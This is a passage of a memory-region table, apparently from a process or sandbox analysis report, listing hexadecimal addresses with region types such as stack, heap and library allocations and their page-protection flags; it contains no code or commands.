stack
|
page read and write
|
||
|
7DA710D000
|
stack
|
page read and write
|
||
|
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
|
FF070CD000
|
stack
|
page read and write
|
||
|
C0000B4000
|
direct allocation
|
page read and write
|
||
|
29E52674000
|
heap
|
page read and write
|
||
|
7FFD9B9A2000
|
trusted library allocation
|
page read and write
|
||
|
1EC5EDC9000
|
heap
|
page read and write
|
||
|
C0003C6000
|
direct allocation
|
page read and write
|
||
|
2A858A32000
|
heap
|
page read and write
|
||
|
201CA780000
|
heap
|
page read and write
|
||
|
2813837D000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
2813833E000
|
heap
|
page read and write
|
||
|
1EC46ED7000
|
trusted library allocation
|
page read and write
|
||
|
1DF582A0000
|
heap
|
page read and write
|
||
|
1EC5F0EB000
|
heap
|
page read and write
|
||
|
17EEA523000
|
trusted library allocation
|
page read and write
|
||
|
C0000BE000
|
direct allocation
|
page read and write
|
||
|
28138374000
|
heap
|
page read and write
|
||
|
C000051000
|
direct allocation
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
2813BCA0000
|
direct allocation
|
page read and write
|
||
|
2813BD20000
|
direct allocation
|
page read and write
|
||
|
7FFD9B9CB000
|
trusted library allocation
|
page read and write
|
||
|
1EA09100000
|
heap
|
page read and write
|
||
|
C000498000
|
direct allocation
|
page read and write
|
||
|
310FCF9000
|
stack
|
page read and write
|
||
|
1FF2D420000
|
heap
|
page read and write
|
||
|
C0003DB000
|
direct allocation
|
page read and write
|
||
|
1EC46B40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
17EE5D00000
|
heap
|
page read and write
|
||
|
2813BB80000
|
direct allocation
|
page read and write
|
||
|
C000392000
|
direct allocation
|
page read and write
|
||
|
17E80433000
|
heap
|
page read and write
|
||
|
7DA59EE000
|
stack
|
page read and write
|
||
|
29E52BA6000
|
heap
|
page read and write
|
||
|
17EEA455000
|
trusted library allocation
|
page read and write
|
||
|
179D3B40000
|
heap
|
page read and write
|
||
|
17EEA54B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page execute and read and write
|
||
|
C000190000
|
direct allocation
|
page read and write
|
||
|
25BE6124000
|
heap
|
page read and write
|
||
|
7FFD9BA6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
C000062000
|
direct allocation
|
page read and write
|
||
|
39382CC000
|
stack
|
page read and write
|
||
|
2A86A80A000
|
trusted library allocation
|
page read and write
|
||
|
17EEA51B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA66000
|
trusted library allocation
|
page read and write
|
||
|
7DA6E4E000
|
stack
|
page read and write
|
||
|
7FFD9BD04000
|
trusted library allocation
|
page read and write
|
||
|
281382C0000
|
heap
|
page read and write
|
||
|
2A872D82000
|
heap
|
page read and write
|
||
|
17EE7430000
|
heap
|
page execute and read and write
|
||
|
2A8743B0000
|
unclassified section
|
page write copy
|
||
|
39383CB000
|
stack
|
page read and write
|
||
|
1AE1A7D3000
|
heap
|
page read and write
|
||
|
29E52692000
|
heap
|
page read and write
|
||
|
C0000A0000
|
direct allocation
|
page read and write
|
||
|
1EC44F7D000
|
heap
|
page read and write
|
||
|
C000460000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page execute and read and write
|
||
|
179D1FC5000
|
heap
|
page read and write
|
||
|
7FFD9B99B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
FF062F7000
|
stack
|
page read and write
|
||
|
29E52ACB000
|
heap
|
page read and write
|
||
|
2813BC57000
|
direct allocation
|
page read and write
|
||
|
1EA08F30000
|
heap
|
page read and write
|
||
|
269938F000
|
stack
|
page read and write
|
||
|
1F984320000
|
heap
|
page read and write
|
||
|
2A8743B2000
|
unclassified section
|
page read and write
|
||
|
1AE12754000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBE3000
|
trusted library allocation
|
page read and write
|
||
|
17EEA453000
|
trusted library allocation
|
page read and write
|
||
|
2A872BE7000
|
heap
|
page read and write
|
||
|
1EC46B70000
|
trusted library allocation
|
page read and write
|
||
|
1DF58110000
|
heap
|
page read and write
|
||
|
17E80253000
|
heap
|
page read and write
|
||
|
1EC488DC000
|
trusted library allocation
|
page read and write
|
||
|
201CB5C2000
|
trusted library allocation
|
page read and write
|
||
|
E1F028E000
|
stack
|
page read and write
|
||
|
29E3A8E7000
|
trusted library allocation
|
page read and write
|
||
|
C000450000
|
direct allocation
|
page read and write
|
||
|
17EE79DB000
|
trusted library allocation
|
page read and write
|
||
|
17EEA58F000
|
trusted library allocation
|
page read and write
|
||
|
1DF58490000
|
heap
|
page read and write
|
||
|
2813BB40000
|
direct allocation
|
page read and write
|
||
|
1AE1A79E000
|
heap
|
page read and write
|
||
|
393854D000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
207C40D0000
|
heap
|
page read and write
|
||
|
2A8743AE000
|
unclassified section
|
page write copy
|
||
|
3938249000
|
stack
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
1EC44F20000
|
heap
|
page read and write
|
||
|
201C8D0D000
|
heap
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
2A85A781000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page execute and read and write
|
||
|
28138379000
|
heap
|
page read and write
|
||
|
1AE02266000
|
heap
|
page read and write
|
||
|
17EE9E56000
|
trusted library allocation
|
page read and write
|
||
|
FAB6F8C000
|
stack
|
page read and write
|
||
|
1EC46BB0000
|
trusted library allocation
|
page read and write
|
||
|
201C8F74000
|
heap
|
page read and write
|
||
|
179D200E000
|
heap
|
page read and write
|
||
|
FAB61BE000
|
stack
|
page read and write
|
||
|
1AE00787000
|
heap
|
page read and write
|
||
|
2813BDE0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BB42000
|
trusted library allocation
|
page read and write
|
||
|
FF0704E000
|
stack
|
page read and write
|
||
|
AD630FF000
|
stack
|
page read and write
|
||
|
201CA590000
|
heap
|
page readonly
|
||
|
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
FAB643E000
|
stack
|
page read and write
|
||
|
21EF0BDA000
|
heap
|
page read and write
|
||
|
179D2004000
|
heap
|
page read and write
|
||
|
7FFD9B98D000
|
trusted library allocation
|
page execute and read and write
|
||
|
FAB5FFE000
|
stack
|
page read and write
|
||
|
7FFD9BB61000
|
trusted library allocation
|
page read and write
|
||
|
393757E000
|
stack
|
page read and write
|
||
|
C000324000
|
direct allocation
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
17EE9D6D000
|
trusted library allocation
|
page read and write
|
||
|
17EEA4E9000
|
trusted library allocation
|
page read and write
|
||
|
2A86C5A7000
|
trusted library allocation
|
page read and write
|
||
|
17EEA01B000
|
trusted library allocation
|
page read and write
|
||
|
29E3AF31000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
1EC482C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
28139D00000
|
direct allocation
|
page read and write
|
||
|
C00005C000
|
direct allocation
|
page read and write
|
||
|
3937277000
|
stack
|
page read and write
|
||
|
1AE02832000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC5EE26000
|
heap
|
page read and write
|
||
|
2A85A410000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9BB000
|
trusted library allocation
|
page read and write
|
||
|
17EEA4BB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
C000012000
|
direct allocation
|
page read and write
|
||
|
1EA08F40000
|
heap
|
page read and write
|
||
|
29E52ABB000
|
heap
|
page read and write
|
||
|
17EE5AD9000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB82000
|
trusted library allocation
|
page read and write
|
||
|
7DF4146E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B982000
|
trusted library allocation
|
page read and write
|
||
|
201CA7F8000
|
heap
|
page read and write
|
||
|
2813830A000
|
heap
|
page read and write
|
||
|
393807E000
|
stack
|
page read and write
|
||
|
1EA08F00000
|
heap
|
page read and write
|
||
|
29E387FC000
|
heap
|
page read and write
|
||
|
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
|
28138386000
|
heap
|
page read and write
|
||
|
1F7E936A000
|
heap
|
page read and write
|
||
|
1FF2D3E0000
|
heap
|
page read and write
|
||
|
2A85AB61000
|
trusted library allocation
|
page read and write
|
||
|
C000274000
|
direct allocation
|
page read and write
|
||
|
201E2FE9000
|
heap
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
29E52780000
|
heap
|
page execute and read and write
|
||
|
C000400000
|
direct allocation
|
page read and write
|
||
|
1AE0081C000
|
heap
|
page read and write
|
||
|
17EEA539000
|
trusted library allocation
|
page read and write
|
||
|
28138301000
|
heap
|
page read and write
|
||
|
28138390000
|
heap
|
page read and write
|
||
|
2813838D000
|
heap
|
page read and write
|
||
|
17EE7380000
|
heap
|
page read and write
|
||
|
1FF2D414000
|
heap
|
page read and write
|
||
|
201E2FC2000
|
heap
|
page read and write
|
||
|
281382E2000
|
heap
|
page read and write
|
||
|
3044C7F000
|
stack
|
page read and write
|
||
|
2813BC40000
|
direct allocation
|
page read and write
|
||
|
1EC48591000
|
trusted library allocation
|
page read and write
|
||
|
2813BDC0000
|
direct allocation
|
page read and write
|
||
|
1EC5F0C4000
|
heap
|
page read and write
|
||
|
1AE02260000
|
heap
|
page read and write
|
||
|
C000436000
|
direct allocation
|
page read and write
|
||
|
281382EF000
|
heap
|
page read and write
|
||
|
C0000B6000
|
direct allocation
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
29E3A6AE000
|
trusted library allocation
|
page read and write
|
||
|
28139D40000
|
direct allocation
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA66000
|
trusted library allocation
|
page read and write
|
||
|
310FBFE000
|
stack
|
page read and write
|
||
|
C000456000
|
direct allocation
|
page read and write
|
||
|
2813BD00000
|
direct allocation
|
page read and write
|
||
|
17E80368000
|
heap
|
page read and write
|
||
|
E1EF579000
|
stack
|
page read and write
|
||
|
2813834F000
|
heap
|
page read and write
|
||
|
2A8743E1000
|
unclassified section
|
page read and write
|
||
|
1AE1A980000
|
heap
|
page execute and read and write
|
||
|
17E18870000
|
heap
|
page read and write
|
||
|
3937378000
|
stack
|
page read and write
|
||
|
E1F024D000
|
stack
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB42000
|
trusted library allocation
|
page read and write
|
||
|
21EF0BC0000
|
heap
|
page read and write
|
||
|
7FFD9BA86000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DA6DCE000
|
stack
|
page read and write
|
||
|
17E80381000
|
heap
|
page read and write
|
||
|
179D3E9A000
|
heap
|
page read and write
|
||
|
FF0647E000
|
stack
|
page read and write
|
||
|
21EF0AF0000
|
heap
|
page read and write
|
||
|
179D3E96000
|
heap
|
page read and write
|
||
|
C00004D000
|
direct allocation
|
page read and write
|
||
|
2813831B000
|
heap
|
page read and write
|
||
|
2A858D90000
|
heap
|
page read and write
|
||
|
17EE74D6000
|
heap
|
page read and write
|
||
|
201CA7E0000
|
heap
|
page read and write
|
||
|
1D66E7A0000
|
heap
|
page read and write
|
||
|
25BE5E20000
|
heap
|
page read and write
|
||
|
2A873028000
|
direct allocation
|
page read and write
|
||
|
C0002FC000
|
direct allocation
|
page read and write
|
||
|
7DA5D7E000
|
stack
|
page read and write
|
||
|
1F7E9330000
|
heap
|
page read and write
|
||
|
201C8CF3000
|
heap
|
page read and write
|
||
|
179D3E93000
|
heap
|
page read and write
|
||
|
1AE126F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
29E38888000
|
heap
|
page read and write
|
||
|
39371FE000
|
stack
|
page read and write
|
||
|
3936DED000
|
stack
|
page read and write
|
||
|
28138370000
|
heap
|
page read and write
|
||
|
2A85A3F0000
|
trusted library allocation
|
page read and write
|
||
|
21EF0BD7000
|
heap
|
page read and write
|
||
|
1EC5F0A1000
|
heap
|
page read and write
|
||
|
2A85A490000
|
trusted library allocation
|
page read and write
|
||
|
1EC5F0A9000
|
heap
|
page read and write
|
||
|
7FFD9BA3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A872DA4000
|
heap
|
page read and write
|
||
|
201E2FDD000
|
heap
|
page read and write
|
||
|
2A85A760000
|
direct allocation
|
page read and write
|
||
|
17E804BB000
|
heap
|
page read and write
|
||
|
17E802B9000
|
heap
|
page read and write
|
||
|
17EEA4B9000
|
trusted library allocation
|
page read and write
|
||
|
C000424000
|
direct allocation
|
page read and write
|
||
|
25BE5F09000
|
heap
|
page read and write
|
||
|
281382EA000
|
heap
|
page read and write
|
||
|
7FFD9BB31000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
1AE026D0000
|
heap
|
page execute and read and write
|
||
|
207C4107000
|
heap
|
page read and write
|
||
|
1AE02110000
|
trusted library allocation
|
page read and write
|
||
|
29E3A6B6000
|
trusted library allocation
|
page read and write
|
||
|
29E3B305000
|
trusted library allocation
|
page read and write
|
||
|
2A8743EB000
|
unclassified section
|
page write copy
|
||
|
17E171C5000
|
heap
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
2A858DB6000
|
heap
|
page read and write
|
||
|
2A85AAFF000
|
trusted library allocation
|
page read and write
|
||
|
2813832D000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
17EE5AAD000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
2066B450000
|
heap
|
page read and write
|
||
|
24150D60000
|
heap
|
page read and write
|
||
|
2813830E000
|
heap
|
page read and write
|
||
|
2A8799AA000
|
direct allocation
|
page read and write
|
||
|
17EEA005000
|
trusted library allocation
|
page read and write
|
||
|
1AE1ACC0000
|
heap
|
page read and write
|
||
|
28139DA3000
|
heap
|
page read and write
|
||
|
29E52AC0000
|
heap
|
page read and write
|
||
|
1FF2D440000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B983000
|
trusted library allocation
|
page execute and read and write
|
||
|
2813834E000
|
heap
|
page read and write
|
||
|
201CBFD8000
|
trusted library allocation
|
page read and write
|
||
|
7DA5CFE000
|
stack
|
page read and write
|
||
|
7FFD9BA6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AE0077D000
|
heap
|
page read and write
|
||
|
2A8743AF000
|
unclassified section
|
page read and write
|
||
|
29E3B297000
|
trusted library allocation
|
page read and write
|
||
|
3B9D1EC000
|
stack
|
page read and write
|
||
|
201CC350000
|
trusted library allocation
|
page read and write
|
||
|
1EC56CC0000
|
trusted library allocation
|
page read and write
|
||
|
FAB5F79000
|
stack
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
1AE027E3000
|
trusted library allocation
|
page read and write
|
||
|
2813837F000
|
heap
|
page read and write
|
||
|
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AE027E0000
|
trusted library allocation
|
page read and write
|
||
|
2A874789000
|
unclassified section
|
page write copy
|
||
|
2A858A8D000
|
heap
|
page read and write
|
||
|
201C8D38000
|
heap
|
page read and write
|
||
|
2A8589C0000
|
heap
|
page read and write
|
||
|
1EC5F0D6000
|
heap
|
page read and write
|
||
|
2813BCC0000
|
direct allocation
|
page read and write
|
||
|
2A872D60000
|
heap
|
page read and write
|
||
|
2A872CED000
|
heap
|
page read and write
|
||
|
17EE7357000
|
heap
|
page execute and read and write
|
||
|
7DF499380000
|
trusted library allocation
|
page execute and read and write
|
||
|
FF05BFE000
|
stack
|
page read and write
|
||
|
E1F030E000
|
stack
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
7BB6FFD000
|
stack
|
page read and write
|
||
|
FF0607C000
|
stack
|
page read and write
|
||
|
7DA617C000
|
stack
|
page read and write
|
||
|
2A858A30000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
29E387F2000
|
heap
|
page read and write
|
||
|
C0004A2000
|
direct allocation
|
page read and write
|
||
|
C000086000
|
direct allocation
|
page read and write
|
||
|
7FFD9BB6A000
|
trusted library allocation
|
page read and write
|
||
|
29E3BDE3000
|
trusted library allocation
|
page read and write
|
||
|
17EE8586000
|
trusted library allocation
|
page read and write
|
||
|
1EC46B30000
|
heap
|
page readonly
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
201CAA19000
|
trusted library allocation
|
page read and write
|
||
|
C00046C000
|
direct allocation
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
29E52AFF000
|
heap
|
page read and write
|
||
|
2A872D27000
|
heap
|
page read and write
|
||
|
201C8CED000
|
heap
|
page read and write
|
||
|
71BC2FE000
|
stack
|
page read and write
|
||
|
1EA092E0000
|
heap
|
page read and write
|
||
|
E1F068E000
|
stack
|
page read and write
|
||
|
2066B448000
|
heap
|
page read and write
|
||
|
21EF0AD0000
|
heap
|
page read and write
|
||
|
7DA5E7D000
|
stack
|
page read and write
|
||
|
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
|
1DF58494000
|
heap
|
page read and write
|
||
|
1AE1A8A0000
|
heap
|
page read and write
|
||
|
FF060FE000
|
stack
|
page read and write
|
||
|
179D1FD8000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
|
17EE5CF7000
|
trusted library allocation
|
page read and write
|
||
|
201E2FD4000
|
heap
|
page read and write
|
||
|
29E4A1D1000
|
trusted library allocation
|
page read and write
|
||
|
1D66E6A7000
|
heap
|
page read and write
|
||
|
E1F070F000
|
stack
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
C00046A000
|
direct allocation
|
page read and write
|
||
|
2A872B82000
|
heap
|
page read and write
|
||
|
179D1FD8000
|
heap
|
page read and write
|
||
|
201CC02E000
|
trusted library allocation
|
page read and write
|
||
|
29E3A6A6000
|
trusted library allocation
|
page read and write
|
||
|
C0002CF000
|
direct allocation
|
page read and write
|
||
|
281384D0000
|
heap
|
page read and write
|
||
|
17E16F52000
|
heap
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C0003DD000
|
direct allocation
|
page read and write
|
||
|
7FFD9B9AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AE1A6F1000
|
heap
|
page read and write
|
||
|
7FFD9BDE0000
|
trusted library allocation
|
page read and write
|
||
|
71BC2F4000
|
stack
|
page read and write
|
||
|
29E386E0000
|
heap
|
page read and write
|
||
|
2A858DB0000
|
heap
|
page read and write
|
||
|
2A873020000
|
direct allocation
|
page read and write
|
||
|
97D5F3C000
|
stack
|
page read and write
|
||
|
29E387FA000
|
heap
|
page read and write
|
||
|
C00041E000
|
direct allocation
|
page read and write
|
||
|
201C8CB0000
|
heap
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
29E3AF3D000
|
trusted library allocation
|
page read and write
|
||
|
29E3B2BE000
|
trusted library allocation
|
page read and write
|
||
|
29E52760000
|
trusted library allocation
|
page read and write
|
||
|
3044CFF000
|
stack
|
page read and write
|
||
|
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC4713E000
|
trusted library allocation
|
page read and write
|
||
|
17E16D20000
|
heap
|
page read and write
|
||
|
28138356000
|
heap
|
page read and write
|
||
|
16108120000
|
heap
|
page read and write
|
||
|
C00048B000
|
direct allocation
|
page read and write
|
||
|
29E526A9000
|
heap
|
page read and write
|
||
|
201CC053000
|
trusted library allocation
|
page read and write
|
||
|
25BE5F00000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
B7C49CF000
|
stack
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
17E803C5000
|
heap
|
page read and write
|
||
|
29E38764000
|
heap
|
page read and write
|
||
|
7FFD9BB52000
|
trusted library allocation
|
page read and write
|
||
|
2A8799ED000
|
direct allocation
|
page read and write
|
||
|
2A872B85000
|
heap
|
page read and write
|
||
|
7FFD9BA5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
E1EF1FD000
|
stack
|
page read and write
|
||
|
29E3B22A000
|
trusted library allocation
|
page read and write
|
||
|
2813831B000
|
heap
|
page read and write
|
||
|
2A872B6A000
|
heap
|
page read and write
|
||
|
1AE006F0000
|
heap
|
page read and write
|
||
|
29E38790000
|
trusted library allocation
|
page read and write
|
||
|
28139D20000
|
direct allocation
|
page read and write
|
||
|
21EF09F0000
|
heap
|
page read and write
|
||
|
201E3333000
|
heap
|
page read and write
|
||
|
2A85AAF7000
|
trusted library allocation
|
page read and write
|
||
|
C000500000
|
direct allocation
|
page read and write
|
||
|
E1F040C000
|
stack
|
page read and write
|
||
|
28138305000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
201CA5F0000
|
heap
|
page execute and read and write
|
||
|
281382FF000
|
heap
|
page read and write
|
||
|
F1D28EC000
|
stack
|
page read and write
|
||
|
2813BD6E000
|
direct allocation
|
page read and write
|
||
|
1EC482BC000
|
trusted library allocation
|
page read and write
|
||
|
29E521DD000
|
heap
|
page read and write
|
||
|
201CC22B000
|
trusted library allocation
|
page read and write
|
||
|
17E81EE0000
|
heap
|
page read and write
|
||
|
7FFD9BB92000
|
trusted library allocation
|
page read and write
|
||
|
2813831B000
|
heap
|
page read and write
|
||
|
2813839C000
|
heap
|
page read and write
|
||
|
29E52A90000
|
heap
|
page read and write
|
||
|
2A85B3B3000
|
trusted library allocation
|
page read and write
|
||
|
29E4A244000
|
trusted library allocation
|
page read and write
|
||
|
17EE84D4000
|
trusted library allocation
|
page read and write
|
||
|
17EE5A57000
|
heap
|
page read and write
|
||
|
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
201DAC7F000
|
trusted library allocation
|
page read and write
|
||
|
2813BD70000
|
direct allocation
|
page read and write
|
||
|
29E3BB45000
|
trusted library allocation
|
page read and write
|
||
|
35277B000
|
stack
|
page read and write
|
||
|
179D2100000
|
heap
|
page read and write
|
||
|
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
310F7EF000
|
stack
|
page read and write
|
||
|
2A8799C9000
|
direct allocation
|
page read and write
|
||
|
FAB5BEE000
|
stack
|
page read and write
|
||
|
310FDB7000
|
stack
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
29E4A4C1000
|
trusted library allocation
|
page read and write
|
||
|
201C8D33000
|
heap
|
page read and write
|
||
|
207C4314000
|
heap
|
page read and write
|
||
|
281382EB000
|
heap
|
page read and write
|
||
|
C00007A000
|
direct allocation
|
page read and write
|
||
|
7DA708E000
|
stack
|
page read and write
|
||
|
17EE74D4000
|
heap
|
page read and write
|
||
|
2A873090000
|
direct allocation
|
page read and write
|
||
|
1AE02120000
|
heap
|
page readonly
|
||
|
1EC5EDD5000
|
heap
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
17EE7821000
|
trusted library allocation
|
page read and write
|
||
|
29E3BD1A000
|
trusted library allocation
|
page read and write
|
||
|
16107F67000
|
heap
|
page read and write
|
||
|
201CA980000
|
heap
|
page read and write
|
||
|
201C8CB9000
|
heap
|
page read and write
|
||
|
17EE5A40000
|
trusted library section
|
page read and write
|
||
|
201CA67A000
|
heap
|
page read and write
|
||
|
2A872D9A000
|
heap
|
page read and write
|
||
|
28138303000
|
heap
|
page read and write
|
||
|
17E80332000
|
heap
|
page read and write
|
||
|
29E52B45000
|
heap
|
page read and write
|
||
|
1EC5EDDC000
|
heap
|
page read and write
|
||
|
C000014000
|
direct allocation
|
page read and write
|
||
|
1EC44F9F000
|
heap
|
page read and write
|
||
|
7DA627F000
|
stack
|
page read and write
|
||
|
29E52715000
|
heap
|
page read and write
|
||
|
1AE026E1000
|
trusted library allocation
|
page read and write
|
||
|
E1EF67E000
|
stack
|
page read and write
|
||
|
17EE8545000
|
trusted library allocation
|
page read and write
|
||
|
201DAA03000
|
trusted library allocation
|
page read and write
|
||
|
24150AD0000
|
heap
|
page read and write
|
||
|
39375FE000
|
stack
|
page read and write
|
||
|
28138390000
|
heap
|
page read and write
|
||
|
28138315000
|
heap
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
71BC2ED000
|
stack
|
page read and write
|
||
|
201CA633000
|
trusted library allocation
|
page read and write
|
||
|
1EC5EE91000
|
heap
|
page read and write
|
||
|
71BC5FD000
|
stack
|
page read and write
|
||
|
29E5271E000
|
heap
|
page read and write
|
||
|
C0003BA000
|
direct allocation
|
page read and write
|
||
|
17EE58E0000
|
heap
|
page read and write
|
||
|
C0000B0000
|
direct allocation
|
page read and write
|
||
|
2813833A000
|
heap
|
page read and write
|
||
|
C000068000
|
direct allocation
|
page read and write
|
||
|
29E3A1D1000
|
trusted library allocation
|
page read and write
|
||
|
2A872B26000
|
heap
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
7DA5F7E000
|
stack
|
page read and write
|
||
|
179D1F90000
|
heap
|
page read and write
|
||
|
1EC4850A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC06000
|
trusted library allocation
|
page read and write
|
||
|
7DA62FE000
|
stack
|
page read and write
|
||
|
28138377000
|
heap
|
page read and write
|
||
|
7DA6F8F000
|
stack
|
page read and write
|
||
|
29E3880E000
|
heap
|
page read and write
|
||
|
1EC5F0B5000
|
heap
|
page read and write
|
||
|
2A858DBC000
|
heap
|
page read and write
|
||
|
1DF58210000
|
heap
|
page read and write
|
||
|
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
|
2A85A750000
|
heap
|
page execute and read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
2A874718000
|
unclassified section
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
2A873080000
|
direct allocation
|
page read and write
|
||
|
310FC7E000
|
stack
|
page read and write
|
||
|
17E802F8000
|
heap
|
page read and write
|
||
|
28139D80000
|
direct allocation
|
page read and write
|
||
|
2A85A7F9000
|
trusted library allocation
|
page read and write
|
||
|
1AE1A807000
|
heap
|
page execute and read and write
|
||
|
17E804A6000
|
heap
|
page read and write
|
||
|
2A85A580000
|
heap
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
17EE8E37000
|
trusted library allocation
|
page read and write
|
||
|
29E386C0000
|
heap
|
page read and write
|
||
|
201E2DE0000
|
heap
|
page execute and read and write
|
||
|
201CBFBC000
|
trusted library allocation
|
page read and write
|
||
|
28138337000
|
heap
|
page read and write
|
||
|
310FF3E000
|
stack
|
page read and write
|
||
|
2A85A586000
|
heap
|
page read and write
|
||
|
2A85A58E000
|
heap
|
page read and write
|
||
|
E1EEDB2000
|
stack
|
page read and write
|
||
|
E1F060E000
|
stack
|
page read and write
|
||
|
29E52BB8000
|
heap
|
page read and write
|
||
|
17EEA579000
|
trusted library allocation
|
page read and write
|
||
|
28138312000
|
heap
|
page read and write
|
||
|
1AE020B0000
|
heap
|
page read and write
|
||
|
310FAFD000
|
stack
|
page read and write
|
||
|
29E3B15D000
|
trusted library allocation
|
page read and write
|
||
|
FAB5E7E000
|
stack
|
page read and write
|
||
|
201CA8D7000
|
heap
|
page read and write
|
||
|
28138250000
|
heap
|
page read and write
|
||
|
201CBAED000
|
trusted library allocation
|
page read and write
|
||
|
1EC44F49000
|
heap
|
page read and write
|
||
|
201CBFAD000
|
trusted library allocation
|
page read and write
|
||
|
17EE7350000
|
heap
|
page execute and read and write
|
||
|
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
|
281384F0000
|
heap
|
page read and write
|
||
|
24150AF0000
|
heap
